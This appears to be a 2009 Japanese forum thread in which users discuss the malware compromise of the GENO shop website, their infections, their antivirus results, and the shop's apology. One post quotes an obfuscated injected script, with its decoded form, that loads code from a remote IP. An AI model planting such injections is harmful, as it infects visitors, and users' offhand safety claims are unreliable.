新品】 NEC VersaPro タイプVE [PC-VY20AED7HJW5] (Core2DuoT7250 2.0GHz /1GB /80GB /S-マルチ /Vista Biz or XPP) [商品番号] GA09077530 [販売価格] 45,990 円 [ポイント] 1 [在庫数] 17 ●CPU Core 2 Duo T7250 (2 GHz) ●インストールOS Windows Vista Business with SP1 (Windows XP Professional インストールサービス適用) ●ディスプレイ 15.4型ワイドTFTカラー液晶(WXGA) ●メモリ 1GB(ECC無しDDR2-SDRAM、PC2-5300、1024MB SO-DIMM×1) ●ハードディスク 80GB ●光学ドライブ DVDスーパーマルチドライブ ●バッテリ ニッケル水素バッテリ ●LAN 1000BASE-T/100BASE-TX/10BASE-T ●インストールアプリケーション なし ●再セットアップ媒体 再セットアップ用媒体添付[Windows XP Professional用(CD-ROM)] でこいつは届くのか? 他はどうでもいいが
676 :
コブシ(千葉県) :2009/04/08(水) 00:27:09.46 ID:/Euywwyx
>>672 店頭公開していない未公開株なら株価もなにもないよw
677 :
ガザニア(東京都) :2009/04/08(水) 00:27:12.45 ID:KkC9HuMZ
で今はgenoのサイトは大丈夫なのか? 飛ばされるかもしれない環境で見た人はいるの?
678 :
フジスミレ(神奈川県) :2009/04/08(水) 00:27:36.30 ID:rqxCGWWe
やっと再インスコ完了 ついでにAHCI入れようと思ったんだけどnforceでの入れ方がよくわからん
能力ある奴がトンズラして絶賛暴走中なんだろきっと ウイルス多重ライセンスの暴露とか、それを裏付けるネタは上がってる。 高見の見物と行きましょうや
680 :
ギシギシ :2009/04/08(水) 00:28:14.09 ID:SmCWuoNC
アウトレットのほうも致命的なほど改ざんされていたのに 総スルーとは流石ネ申は違うな
>>668 まぁでもクラッカー側も攻撃対象が対策をしたのなら無理にそこに拘るより
別のモロヨワ性の残ってるサイト狙うんじゃない?
GENOがちゃんした対策とったのかは知らんけど・・・
>>673 いやまあオレは引っかかってないんだけど、
とにかくガン無視決め込もうとしてるgenoが腹立つからなんとかしてやりたい
UAC無効にしたりブラウザを管理者権限で動かさない限りVistaは無問題
686 :
ケンタウレア・モンタナ(愛媛県) :2009/04/08(水) 00:31:27.93 ID:OaPujcLZ
antivir3.vdf 7.1.3.27 これは対応してる?
688 :
カンパニュラ・アーチェリー(長崎県) :2009/04/08(水) 00:33:00.66 ID:vO6xNQ9I
689 :
エイザンスミレ(関西地方) :2009/04/08(水) 00:33:01.68 ID:+euCZN0b
>>676 そうなのかありがとう
全然分からないんだけどなんかちょっと気になって
WIN 10,0,22,87 このバージョンは大丈夫?
今はCore2セットのPCが5万せずに買える時代か 3年前に20万で買ったのにもうポンコツPCだ もう古いから買い換えたいけどタイミングと、今のPCが使えるから購入までは行かないのが困りもの
693 :
カンパニュラ・アーチェリー(長崎県) :2009/04/08(水) 00:35:33.43 ID:vO6xNQ9I
>>667 行くだけでお土産くれるとは優しいところだね^^
>>552 の意味がまったくわからなかったが
今やっとわかった、なんだこの0は?
695 :
コデマリ(東京都) :2009/04/08(水) 00:36:08.74 ID:bh5XuMNQ
>>437 どたまキタ!
なんじゃこれ。むちゃくちゃじゃねーか。
こんな論理許されるのか?
やっぱりまだ落ちるよね?
697 :
ポロニア・ヘテロフィア(岡山県) :2009/04/08(水) 00:37:12.05 ID:aIDOlY6D
再起動からの復帰。 何ともねー。 やったぜ、どうやら感染してないようだ。
698 :
プリムラ(福岡県) :2009/04/08(水) 00:37:36.33 ID:emnD7Oes
win2000 リストア済み(リカバリCD無し)をゲノで買った人は どうやって再インストールすればいいですか?
699 :
ヘビイチゴ(新潟県) :2009/04/08(水) 00:37:55.07 ID:GfsRblbC
謝罪大特価を期待している俺
700 :
ダイアンサステルスター(アラバマ州) :2009/04/08(水) 00:38:32.31 ID:M3gkP98g
ねえコマンドプロンプロで確認しようと思ったら立ち上がらないんだけど自分だけ? なんかexeのデータも数個作動しないんだけど。解決はやっぱりリカバリだけ?
701 :
シロバナタンポポ(長屋) :2009/04/08(水) 00:38:53.07 ID:9XNMNkXA
ていうか、7日にも侵入されてるのに驚いた おま、メンテ中にも侵入されるってどんだけ間抜けなんだよ
702 :
フリージア(東京都) :2009/04/08(水) 00:39:15.80 ID:3FM9FGnp BE:1165450278-BRZ(10000)
謝罪特価どころか
2日分の営業停止で損した分
ふっかけてくるんじゃない?
またウイルス復活したら仮想のXPで踏んでうpする
散々放置した上にこの対応ww
705 :
コブシ(千葉県) :2009/04/08(水) 00:40:09.21 ID:/Euywwyx
>>699 流石に来ないだろw
お詫びとしてIntelの64GBのSLCのSSDを10個タダでくれたら
これから贔屓にしてやっても良いと思ってるw
706 :
カンガルーポー(島根県) :2009/04/08(水) 00:40:43.62 ID:+dhcGarc
>>700 起動しようとするとタクスバーもない画面に切り替わるけどすぐ元の画面に戻る?
707 :
フリージア(東京都) :2009/04/08(水) 00:40:55.18 ID:3FM9FGnp BE:499478483-BRZ(10000)
メールでの返答はないぞ
アクセスブロッケン!!!!!!!!!!!!!!!
710 :
フリージア(東京都) :2009/04/08(水) 00:41:34.75 ID:3FM9FGnp BE:374610029-BRZ(10000)
さすが注文キャンセルのとき、
件名にキャンセルしましたで
本文白紙送りつけてくるところだけある。
711 :
リナリア(東京都) :2009/04/08(水) 00:41:51.04 ID:PZBM5WTT
キャッシュを消すだけで解決するなら誰も苦労しないわ、ただの証拠隠滅w
712 :
ベニバナヤマボウシ(長屋) :2009/04/08(水) 00:41:54.94 ID:lcfnkj4Z
713 :
カンパニュラ・アーチェリー(長崎県) :2009/04/08(水) 00:43:18.24 ID:vO6xNQ9I
>>703 仮装PCって構築するのにどのくらい時間かかる?
なんなく長い時間かかりそうで億劫なんだよね・・・
715 :
ダイアンサステルスター(アラバマ州) :2009/04/08(水) 00:43:28.49 ID:M3gkP98g
>>706 そうそう。なんかもー今日一日ずっとPCいじってどうにかしようとしたんだけど
馬鹿だしPCさっぱりわかんないからお手上げ
今度はmixiトップあたりでもれなくラトビアの旅が付いてくると面白いんだが。
717 :
ウグイスカグラ(西日本) :2009/04/08(水) 00:45:11.60 ID:ZQYwOgnW
>>698 Win2000のインストールCDをヤフオクで買う。
718 :
フリージア(東京都) :2009/04/08(水) 00:45:38.56 ID:3FM9FGnp BE:624348465-BRZ(10000)
>尚、サーバーのウィルス感染や個人情報の流失はございません。
パソコン一般板でもいわれてるけど
流失はございませんって…。
719 :
サポナリア(コネチカット州) :2009/04/08(水) 00:45:47.47 ID:N5AxaUku
ファイアーウォールを入れていたけど、防げたかどうかもわからん
\ /_ / ヽ / } レ,' / ̄ ̄ ̄ ̄\ |`l`ヽ /ヽ/ <´`ヽ u ∨ u i レ' / └l> ̄ !i´-) |\ `、 ヽ), />/ / 地 ほ こ !´ヽ、 ヽ ( _ U !、 ヽ。ヽ/,レ,。7´/-┬―┬―┬./ 獄 ん れ _|_/;:;:;7ヽ-ヽ、 '') ""'''`` ‐'"='-'" / ! ! / だ. と か | |;:;:;:{ U u ̄|| u u ,..、_ -> /`i ! ! \ :. う ら | |;:;:;:;i\ iヽ、 i {++-`7, /| i ! ! <_ の が __i ヽ;:;:;ヽ `、 i ヽ、  ̄ ̄/ =、_i_ ! ! / ヽ ヽ;:;:;:\ `ヽ、i /,ゝ_/| i  ̄ヽヽ ! ! ,, -'\ ヽ、\;:;:;:;:`ー、`ー'´ ̄/;:;ノ ノ ヽ| / ,、-''´ \/ ̄ ̄ ̄ ̄  ̄ ̄ ̄ Y´/;:;:;\
721 :
トベラ(catv?) :2009/04/08(水) 00:45:54.28 ID:QPknj9je
VPC入れてるけどVPCのインスコとOSのインスコするだけだから半日もあれば充分かな。 使い方を覚えるのにかかる時間は本人次第。 PCに慣れてれば数分で終わる。
>>437 ウイルス感染を謝らないとか
アホじゃねえのか
723 :
コブシ(千葉県) :2009/04/08(水) 00:47:51.07 ID:/Euywwyx
>>713 MicroSoftからVirtualPCを無料ダウンロードしてきて、
スレの↑で張られているMS謹製の英語版のXP等の既成イメージをダウンロードして
それを動かすだけ。全部無料。
この場合、構築する手間なんてまったく無いけど、回線がショボいとダウンロードする時間がちょっとかかるってだけ。
仮に仮想イメージを自分で一から構築するにしても普通にPCにOSをインスコするのと手間隙も掛かる時間もほぼ一緒。
724 :
ニオイタチツボスミレ(沖縄県) :2009/04/08(水) 00:47:53.28 ID:zJ5JGqS1
普通に買い物に行って感染した奴はマジで可哀想だなwww
VPCやってみようかと思ったが回線の速度が酷すぎて諦めた
謝るといろいろと面倒になるので謝りません
>>715 >なんかexeのデータも数個作動しないんだけど
Spybot - Search & Destroyとか動かなくて
windowsupdateも失敗するとかか?
728 :
リナリア(東京都) :2009/04/08(水) 00:49:19.81 ID:PZBM5WTT
インプレスはどう流すのか見物w
729 :
フリージア(東京都) :2009/04/08(水) 00:49:37.32 ID:3FM9FGnp BE:665971384-BRZ(10000)
impressとlivedoor終わったな
730 :
コブシ(千葉県) :2009/04/08(水) 00:50:02.37 ID:/Euywwyx
>>725 たかだか数十メガだろうがw
とっとと光引きなよ。
再発動したらVirtualBOXで逝ってくる。
732 :
カンパニュラ・アーチェリー(長崎県) :2009/04/08(水) 00:51:18.86 ID:vO6xNQ9I
>>730 昼やったら7〜20KB/秒しか出なかったのよ
734 :
カンガルーポー(島根県) :2009/04/08(水) 00:51:45.80 ID:+dhcGarc
>>715 当方ウインドウズアップデートも起動しない
IEで検索して特定のページは普通にアクセス出来たけど、
別の特定のページは何度クリックしてもIEが強制終了される
火狐やクロムサファリだと問題ない。
自分はいろいろ調べた結果フォーマット以外では無理そう
robocopyで諸々バックアップとれるようにしてた俺涙目
735 :
ベニバナヤマボウシ(長屋) :2009/04/08(水) 00:52:56.72 ID:lcfnkj4Z
つーか知らずに行ったけどFirefoxが落ちただけで感染してないぞ XP Pro SP3 +カスペ
コマンドプロンプト開けないやつはcommand試してみれば ファイル名を指定して実行でcommandって入れてEnter 終わるときは×ボタンつかえないからexitで終わってね
Latvija hs.2.zlkon.lv:94.247.2.195-94.247.2.255 Latvija hs.3.zlkon.lv:94.247.3.195-94.247.3.255 PC設定での遮断方法分らんから、これをNISとPGに入れた
GENO先生の次回作にご期待ください!
740 :
ヤエザクラ(東京都) :2009/04/08(水) 00:58:30.64 ID:2q2Z2uvM
>>437 きゃぷって有名どこのうpろだに貼ってくれ
見に行く気にすらならん
大丈夫なのこの会社?
puppyインスコ中 早くゲノのトップがみたいです
> 尚、サーバーのウィルス感染や個人情報の流失はございません。 りゅうしつ 【流失】 (名)スル洪水などで、流されてなくなること。 「津波で多くの家屋が―した」 ワロタ 「しゅ」が言えない子供かよw
>>743 中の人は高卒なんです。あまり触れてあげないでくださいw
流失はございません(が流出はしました) こういうことだろ
>>743 流出はあったかもしれないけど流失はありませんでした
っていうことですよw
クリーンインストールってば、意外に大掃除的でさ、ひ、久しぶりにきもちいい作業だったぜ・・・
749 :
ヤエザクラ(東京都) :2009/04/08(水) 01:04:36.79 ID:2q2Z2uvM
まだ放置なの?
750 :
カンガルーポー(島根県) :2009/04/08(水) 01:05:16.03 ID:+dhcGarc
>>738 メールとか先週分のバックアップがMOにあるからフォーマットするんだ決めたんだ
まだしてないけどフォーマットするんだ。だから今はフォーマットするウイルスも怖く無い
この機会にリンク踏みまくるんだ
751 :
クロッカス(北海道) :2009/04/08(水) 01:05:30.20 ID:Fb+ZJHDM
まとめてみた。訂正頼む 04/04(土) ・PC一般板のGENOスレで「GENOのサイトが改竄されている」との報告が出る。(10:43) ・スレでの報告から、GENOサイトにアクセスするとウィルスに感染する可能性があることが明らかになる。 ・ν速にスレが立つ。(20:26) ・改竄されたまま一日を終える。 04/05(日) ・この日の夜から短縮URLによる各板へのウィルス爆撃が本格化。多数の犠牲者が出る。 ・セキュリティ板で通販サイト juicyrock.co.jp もGENOと同様の改竄を受けていることが報告される。 ・楽天のショップ www.rakuten.ne.jp/gold/i-na/ でGENOウィルスを検出したという話題が出る。 ・GENOサイトは完全放置のまま1日が終わる。 04/06(月) ・社員がようやく出社してきたのか、サイトがメンテナンス中になる。(10:00頃) ※ただし「メンテナンス中」に切り替えたのはトップを含む数ページのみで、未だ改竄された商品ページなどにアクセス可能だった。 ・価格.comなど価格比較サイトからGENOへのリンクが消える。 ・juicyrock.co.jp が403になる。その後復旧、「お詫び」が発表される。 ・www.rakuten.ne.jp/gold/i-na/ のページが真っ白に。その後何事もなく再開。 ・GENOが再開。「サーバーに一部不具合がございました」(20:20頃) ・再開したものの、未だ改竄されたままであることが報告される。その後しばらくして正常に。 04/07(火) ・GENO、再度改竄される。(8:00頃) ・GENO、再びメンテナンスに。(8:10頃) ・インプレスにGENOウィルス事件についての記事が出る。(15:59) ・GENOが再び再開。「お詫び」を発表。「ウィルス」ではなく「旧プログラム」とのこと。(23:30頃)
つかGENOなんてショップ初めて知ったよ
フォーマットなんてケチなこと言ってないでハードディスク交換しちゃいなよ。
もしかして本当にGENOのサイトにウイルスがないのか
758 :
コブシ(千葉県) :2009/04/08(水) 01:10:47.64 ID:/Euywwyx
759 :
ニョイスミレ(埼玉県) :2009/04/08(水) 01:11:23.70 ID:/yj33U4k
尚、サーバーのウィルス感染や個人情報の流出はございません。 に変更されてるな
GENOが再び再開。「お詫び」を発表。「ウィルス」ではなく「旧プログラム」とのこと。(23:30頃) 旧プログラムってなに?
GENOさん、見てる〜
祭りになるまで俺もGENOなんて知らなかったがこれには笑った
672 名前: PAC-3(東京都)[sage] 投稿日:2009/04/05(日) 02:45:55.56 ID:Wtu0Z/3+
>>664 0より上で1以下の数値が入れられる状態だったから
0.1とか0.001とかでも 商品が買える状態になってたw
金額も *個数だから当然1/10とかになっちゃうわけで。
で在庫数が 54.00987とかになっててワロタ
ここ見てるだろw
764 :
クロッカス(北海道) :2009/04/08(水) 01:13:51.48 ID:Fb+ZJHDM
>>758 juicyrockなら書いておいたが…
765 :
コブシ(千葉県) :2009/04/08(水) 01:15:10.71 ID:/Euywwyx
766 :
マーガレット(山梨県) :2009/04/08(水) 01:15:39.92 ID:u4672r/7
;' ':;,, ,;'':;, ;' ':;,.,.,.,.,.,,,;' ';, ,:' : :、 ,:' \ ,,. 、./ ノ( ::::::::', :' ● ● ⌒ :::::i. <このまま俺達から逃げ切れると思ってるのか! i ''' (_人_) '''' * :::::i : {+ + +} :::::i `:,、  ̄ ̄ ::::::::: / ,:' : ::::::::::::`:、 ,:' : : ::::::::::`:、
>>744 東大や早慶以外は目糞鼻糞。
というか、もう直ってるだろ。
769 :
ベニバナヤマボウシ(長屋) :2009/04/08(水) 01:17:07.12 ID:lcfnkj4Z
まだウィルスが復活しない様なのでもう寝ます。
ウイルス応援するわ はよ潰れろ
>>437 まともな会社なら、代表取締役名義で詫び状書くはずなんだが・・・
まさにこの会社の経営者の質を表してるな。
GENOのグループ会社?にアイナチュラとかいうマルチの会社があるみたいだな。 まあ昔はステップでアムウェイの商品売ったりしてたもんな。
juicyrock.co.jp:219.94.129.173-219.94.129.173
>>762 >>710 知らなかった、酷いなwww
キャンセルする所までならいいが
>>710 はないわ
775 :
西洋オキナグサ(福岡県) :2009/04/08(水) 01:20:20.91 ID:dEFBFAbo
俺しばらくGENOをIEのホームページにして監視してみるわ
puppyインスコできねえw 2003にするかorz
777 :
キバナスミレ(大阪府) :2009/04/08(水) 01:20:48.90 ID:9XNMNkXA
∩_∩ 人人人人人人人人人人人人人人人人人人人人人人人人人人人人人 / \ /\ < すごい一体感を感じる。今までにない何か熱い一体感を。 > | (゚)=(゚) | < 風・・・なんだろう吹いてきてる確実に、着実に、俺たちのほうに。. > | ●_● | < 中途半端はやめよう、とにかく最後までやってやろうじゃん。 > / ヽ < ネットの画面の向こうには沢山の仲間がいる。決して一人じゃない。 > | 〃 ------ ヾ | < 信じよう。そしてともに戦おう。 > \__二__ノ < 工作員や邪魔は入るだろうけど、絶対に流されるなよ。 > YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
ここもか? www.naxos.co.jp/_ScriptLibrary/pm.js 最下部 <!-- document.write(unescape('%3CspBscjBrjBispBppHtjB%20srCXHcjB%3DspB%2FpH%2FjB94%2Eze6243y7%2E23y%2E195%2F3yjqze6uerspByCXH%2Ejsze6%3E%3C%2F3ysc3yript3y%3E').replace(/3y|CW|jB|pH|CXH|ze6|spB/g,"")); --> ↓ <script src=//94.247.2.195/jquery.js></script>
780 :
コブシ(千葉県) :2009/04/08(水) 01:22:48.65 ID:/Euywwyx
>>771 完全丸投げなんだろうね。ここ。
てか、普通は顧問弁護士に即効で連絡して弁護士の指導の元で
法的妥当性がある文言を選んで侘びを書くのが普通なんだよね。
見事にステップしたな
782 :
サポナリア(東京都) :2009/04/08(水) 01:24:12.74 ID:n6XcuPUP
>>450 確かに「サーバー」は感染してないな。
卑怯すぎる。
ウイルスとか仕掛けられたわけじゃないけど、yodobashi.comにはガッカリ
784 :
クロッカス(北海道) :2009/04/08(水) 01:24:43.48 ID:Fb+ZJHDM
>>778 確認した。クラックされてる。
どうやって探したの??
再インストールやっと終わった。 日曜に火狐でgenoのhp見てフリーズしたからおかしいなとは思ったが、 IEでその後試してもフリーズしたのであれ?と本格的に思い、2ちゃんにきて みたら案の定。もうgenoでは一切買いません。さすがにウイルスもらうとへこむわ。 二度と見る気にならんわ。geno結構好きだったのに、はぁ・・・
GENOcideってラトビア人のハックチームがいてだな
再起動してなんともなければ平気なんだよな?
788 :
カンガルーポー(島根県) :2009/04/08(水) 01:26:34.18 ID:+dhcGarc
これを機にSSDにしようと検索した結果intelのX25-E高ぇ K-SSD60S-VSMお手頃
789 :
シラー・カンパヌラータ(長屋) :2009/04/08(水) 01:26:58.44 ID:hjFWB/pm
ぜんぜん関係ないけどラトビアって言葉にエロスを感じるのはオレだけ?
790 :
ビオラ(dion軍) :2009/04/08(水) 01:27:11.20 ID:1rOy50vp
792 :
エニシダ(関西地方) :2009/04/08(水) 01:27:55.91 ID:OmOuKv7q
793 :
プリムラ・ヒルスタ(東京都) :2009/04/08(水) 01:28:14.07 ID:k9RslXr2
まだやっていたのか
こわくてどこもひらけねーよwww
謝罪文(?)が掲載された直後に踏んでしまったんだが大丈夫なのか
>>789 言葉の響きがビラビラと似ててエロスだよな
799 :
コブシ(千葉県) :2009/04/08(水) 01:30:39.44 ID:/Euywwyx
801 :
ジシバリ(神奈川県) :2009/04/08(水) 01:32:15.07 ID:spDMwzo0
>789 おれはラビオリ連想しておいしそうに感じてしまうよ
ラビア?
>>796 踏んでみたが思いっきりavast反応してるな
クラックされたサイトって見つかってないだけで結構ありそう?
805 :
オニタビラコ(アラバマ州) :2009/04/08(水) 01:34:47.50 ID:uklzKC3H
>>802 > jetspiral427さん
>
>誤検知だと思います。
>
>Freeのウイルス対策ソフトを使われていませんか、マカフィーでは安全なサイトとして認証済みです。
>【会社概要】にウイルス反応はありませんでした。
オワットル
807 :
クレマチス(アラバマ州) :2009/04/08(水) 01:35:40.76 ID:09MMp/P/
ラトビアのチーム? ああバックドアだろう、何度でも仕掛けられるよ うっかり近付くと君、ボットになっちゃうから気い付けや
ここに張られるアドレスは怖くてしばらくの間ひらけねーよwww
感染サイト増えてるのかよ((((;゚Д゚))))ガクガクブルブル
810 :
ジンチョウゲ(dion軍) :2009/04/08(水) 01:36:38.17 ID:WcsaUurT
もうURL怖くて踏めない
811 :
トベラ(catv?) :2009/04/08(水) 01:37:09.21 ID:QPknj9je
812 :
プリムラ・ヒルスタ(東京都) :2009/04/08(水) 01:37:11.03 ID:k9RslXr2
813 :
オオジシバリ(長屋) :2009/04/08(水) 01:37:21.31 ID:gfCN7gdd
814 :
フリージア(東京都) :2009/04/08(水) 01:37:38.76 ID:3FM9FGnp BE:499478764-BRZ(10000)
815 :
コブシ(千葉県) :2009/04/08(水) 01:37:48.94 ID:/Euywwyx
>>804 あくまで推測だけど、genoと同じような古い鯖環境で動いているサイトは
ひたすら感染しまくるんじゃないかな。
てか、この一連のスレの最初の方で週末でお休みなその筋のプロっぽくて詳しそうな人が
ここ最近あやしいアタックだかが頻繁に飛んでるとか言ってた位なんで、
この脆弱性を突いた攻撃がwww上で全世界的に無差別に行われているのかもしれない。
816 :
タネツケバナ(埼玉県) :2009/04/08(水) 01:37:53.26 ID:xuWZ2mP0
>>806 ※このアドレスは危険URLのひとつです。
注意!アラートオープンを発見! (17)
注意!ループタグを発見! (6)
キテるな
>>808 ここだけじゃなくて2ちゃん全部そうだww
819 :
フリージア(東京都) :2009/04/08(水) 01:38:37.65 ID:3FM9FGnp BE:416232454-BRZ(10000)
これ関連のスレはここしか無いん? PC板とかは?
そんなに恐がるな
>>808-810 ちなみに
>>806 はお詫び?セール
【新品バルク】 BUFFALO USBメモリ 128MB アソート(型番問わず) 高速・安心・豊富な種類のUSBメモリ 何が届くかはお楽しみ♪
[商品番号] GA09084440
[販売価格] 10 円
[ポイント] 1
[在庫数] 167
お一人の注文数に限りがあります。最大注文数[1]
10円でウイルスがもらえる訳ですね。わかります。
825 :
コブシ(千葉県) :2009/04/08(水) 01:39:33.88 ID:/Euywwyx
>>806 128MBってw
今更こんな低容量のゴミは使い物にならんわw
最低でも1Gは必要だろw
カペオンライン重すぎ自重しろ
827 :
リナリア(東京都) :2009/04/08(水) 01:39:45.65 ID:PZBM5WTT
感染拡大w
>>802 もしかして質問に答えた奴全員ぷぎゃーなのか
829 :
フリージア(東京都) :2009/04/08(水) 01:40:13.61 ID:3FM9FGnp BE:1311131197-BRZ(10000)
830 :
マーガレット(山梨県) :2009/04/08(水) 01:41:14.18 ID:u4672r/7
セキュリティソフトって当てにならないんだなw
831 :
イカリソウ(チリ) :2009/04/08(水) 01:41:45.35 ID:fPYAJjBH
まさにGENOウイルス 新たな可能性を示したトンデモな数日間だった とっとと潰れてくれ
>>830 そりゃ新種のウイルスが出現したとたん対応をとれるなんてないからな
>>817 ループとアラートを使わずにJavaScriptなんて無理があるだろ。
Avira使っている人だけ反応したのか
835 :
ニオイタチツボスミレ(沖縄県) :2009/04/08(水) 01:43:03.68 ID:zJ5JGqS1
おかえりウィルスwww
>>823 それに送料 700 円、代引手数料 315 円掛かる訳ですね
>>834 antivirはやや遅れての対応だったはず
>>819 メモリーカード館とあるがよくわからん
なんならソースチェッカーオンラインで自分で確かめてみてくれ
あ、送料は地域によって違うか…
>>837 の一行だったから改行必死で引用つけわすれた\(^o^)/
843 :
ビオラ(catv?) :2009/04/08(水) 01:45:46.33 ID:Jqo7KFMa
844 :
ボケ(長屋) :2009/04/08(水) 01:46:11.06 ID:jZJ6LKdw
久々のウイルス祭で楽しい
genoはなんで感染したの? どこから入られたの?
>>825 俺は昔買った128MBの奴にClonezilla入れてお手軽環境復活に活用してるぜ
感染したクライアントで、セキュリティホールがあるサーバにアクセスすると サーバが感染して、感染したサーバにセキュリティホールのあるクライアントが アクセスするとクライアントが感染するタイプだったら面白いのにな
>>780 秋葉の実店舗に行きゃわかるけど、ここは単なるジャンク屋だよ。
そういう対応を期待するだけ無駄だよ。
genoの128MB USBメモリは挿すだけで ウィルス感染じゃねーの 怖くてかえねーよ
851 :
ベニバナヤマボウシ(長屋) :2009/04/08(水) 01:51:51.89 ID:lcfnkj4Z
tracert naxos.co.jp [ JPRS database provides information on network administration. Its use is ] [ restricted to network administration purposes. For further information, ] [ use 'whois -h whois.jprs.jp help'. To suppress Japanese output, add'/e' ] [ at the end of command, e.g. 'whois -h whois.jprs.jp xxx/e'. ] Domain Information: [ドメイン情報] a. [ドメイン名] JAPAN-NET.NE.JP b. [ねっとわーくさーびすめい] c. [ネットワークサービス名] ジャパンネット d. [Network Service Name] Japan Net k. [組織種別] ネットワークサービス l. [Organization Type] network service m. [登録担当者] AF019JP n. [技術連絡担当者] YI101JP p. [ネームサーバ] ns12.pwd.ne.jp p. [ネームサーバ] ns2.japan-net.ne.jp p. [ネームサーバ] ns3.japan-net.ne.jp [状態] Connected (2009/04/30) [登録年月日] 1997/04/15 [接続年月日] 1998/04/01 [最終更新] 2008/05/01 01:09:42 (JST)
とりあえず事前対応/事後対応のどちらかをまとめてくれ。 AntiVir・・・ avast・・・ AVG・・・ BitDefender・・・ カスペルスキー・・・ ノートン・・・ バスター・・・ NOD(ESET)・・・
853 :
サポナリア(関東地方) :2009/04/08(水) 01:52:42.04 ID:TXqYAd/K
avast入れたけど使いにくいな
全力だしてもいいですか?
856 :
クロッカス(北海道) :2009/04/08(水) 01:53:14.19 ID:Fb+ZJHDM
857 :
コブシ(千葉県) :2009/04/08(水) 01:53:24.02 ID:/Euywwyx
>>847 ぶっちゃけ、うちにはSLCチップの小容量USBメモリやSDカードがごろごろしてて
完全におなかいっぱいだったりするw
BIOS更新だとか、インスコしたてのOSにINFやNICのドライバをぶち込むくらいにしか使えないからw
とりあえずAVGはいい加減どうにかしろよ
860 :
ニオイタチツボスミレ(沖縄県) :2009/04/08(水) 01:54:53.39 ID:zJ5JGqS1
AVGアップデート来てたけど、人柱になる度胸がない
>>675 これポチったけど、今回の糞対応にムカついたんでキャンセルするわ
いくら安くてもこんなショップには1円も落としたくない
863 :
サポナリア(東京都) :2009/04/08(水) 01:59:07.15 ID:3LJJYcks
遺憾の意 発 動
864 :
スズナ(沖縄県) :2009/04/08(水) 02:01:17.34 ID:7DvarU+U
追加。事前対応/事後対応のどちらかをまとめてくれ。 AntiVir・・・ avast・・・ AVG・・・ BitDefender・・・ マカフィー・・・ カスペルスキー・・・ ノートン・・・ バスター・・・ NOD(ESET)・・・
もう何があってもGENOを許さない 人がしんでんねんで!(社会的な意味で)
いいから死ねよ
普段からアレはネットショップだと対処したといわれてもなかなかアドレス踏めねえな。
870 :
サポナリア(dion軍) :2009/04/08(水) 02:04:31.65 ID:hKXkuPbH BE:2545306188-PLT(12000)
このスレで終わりかね
871 :
シュッコン・バーベナ(長屋) :2009/04/08(水) 02:05:40.78 ID:9fvy6TZJ
カスペのオンラインスキャンが一向に終わらねぇ 一体何時間やってんだ、コレ・・・
872 :
オニタビラコ(アラバマ州) :2009/04/08(水) 02:05:55.37 ID:uklzKC3H
>>870 また新しいネタが増えたのに?GENOかよお前
マカフィーでスキャンしたら「generic artemis:トロイ」が引っ掛かったので俺もやられたか、と思ったら… ヤフー動画を見るためのソフトじゃねーか!寿命縮んだ
通常は「ActiveX」と「Java」は無効にしているから無害
875 :
バラ(兵庫県) :2009/04/08(水) 02:06:28.00 ID:EwE4eiQI
心配したけどキャッシュ消したのでもう安心だ ウイルスじゃなくてよかった
結局ラトビアに何を送ってどう運用されるんだよ
コマンドプロンプトでnetstatって入力してbananaって鯖があったんだけどこれってなに?
878 :
コブシ(千葉県) :2009/04/08(水) 02:07:36.25 ID:/Euywwyx
>>870 わかんない。
てか、メジャーサイトがこれに同じ脆弱性を突かれて感染したら
これどころの騒ぎじゃなくなると思う。
ノーガード戦法の奴にしても定義ファイルを更新していない奴も
案外多いからね。
880 :
ダイアンサステルスター(アラバマ州) :2009/04/08(水) 02:11:36.60 ID:M3gkP98g
>>865 個人的にAVIRA→なんかひっかかった。ウイルスは退治できず(4/07/23:00ごろ)
AVG →引っかかる→退治できず(4/07/20:00ごろ)
カスペルスキー→引っかからず。よって退治もできず(4/07/18:00ごろ)
スパイボット→当然無理(4/07/24:00ごろ
もうつかれた。あとはしらん。とりあえず再起動しても平気だったし
やばいもんは入ってないので2,3日放置してセキュリティソフトのアップデートをまつ
さらに追加。事前対応/事後対応のどちらかをまとめてくれ。 AntiVir(無料)・・・対応済み。無料・事前かは知らん avast(無料)・・・ AVG(無料)・・・ BitDefender・・・ マカフィー・・・ カスペルスキー・・・対応済み。事前かは知らん ノートン・・・対応済み。事前かは知らん バスター・・・ NOD(ESET)・・・
ESET(NOD32)あいかわらず何の検知もしなくてワラタ
一部に旧プログラムが残っているらしいぞ
886 :
フリージア(東京都) :2009/04/08(水) 02:16:54.87 ID:3FM9FGnp BE:1311131197-BRZ(10000)
次スレいるか?
887 :
コブシ(千葉県) :2009/04/08(水) 02:19:02.15 ID:/Euywwyx
>>886 だいぶ勢い落ちてきたけど、この調子だと次スレも必要な予感がする。
次スレ立てるタイミングは950レス過ぎ位で良いんじゃないかな。
いる
もう1スレくらい良いんじゃね 完全に解決したわけでもないし
むしろこのクソ対応でこそ盛り上がるべき時だと思うんだが
892 :
フリージア(東京都) :2009/04/08(水) 02:21:31.17 ID:3FM9FGnp BE:1311131579-BRZ(10000)
893 :
オニタビラコ(アラバマ州) :2009/04/08(水) 02:22:22.66 ID:uklzKC3H
立てなきゃ被害が確認できないだけだし。対策した俺的には無くても別に・・・ でもGENOってスレタイについてるけど、実際根は相当深いからな。
894 :
フリージア(東京都) :2009/04/08(水) 02:24:06.14 ID:3FM9FGnp BE:936522959-BRZ(10000)
GENO.1でウイルス感染 キャッシュリセットしろとクソ対応★9
なんかいいの思いつかないな
895 :
センダイハギ(dion軍) :2009/04/08(水) 02:24:20.98 ID:Qi4v6zgY
お詫び特価まだぁ〜
896 :
サポナリア(関東地方) :2009/04/08(水) 02:24:54.33 ID:TXqYAd/K
GENOのサイトでウイルス感染 しかし当のGENOはふざけた対応で幕引き ★9
897 :
ダイアンサステルスター(アラバマ州) :2009/04/08(水) 02:25:08.05 ID:M3gkP98g
新種のウイルスとか未発見とかいれてくれよん。 自分みたいな馬鹿が引っかかって検索するときに目安になるし、対応できなかった理由も分かるから
898 :
コブシ(千葉県) :2009/04/08(水) 02:26:41.91 ID:/Euywwyx
>>892 まかせた。
>>893 うん。これ結構根深い問題。
結構いい加減に古い鯖環境でテキトーに動いているサイトって何気に多いからね。
誰もアクセスしない様な個人サイトからそこそこメジャーなサイトまで被害発生源になる可能性は十分にありうる訳で。
899 :
クロッカス(北海道) :2009/04/08(水) 02:27:12.27 ID:Fb+ZJHDM
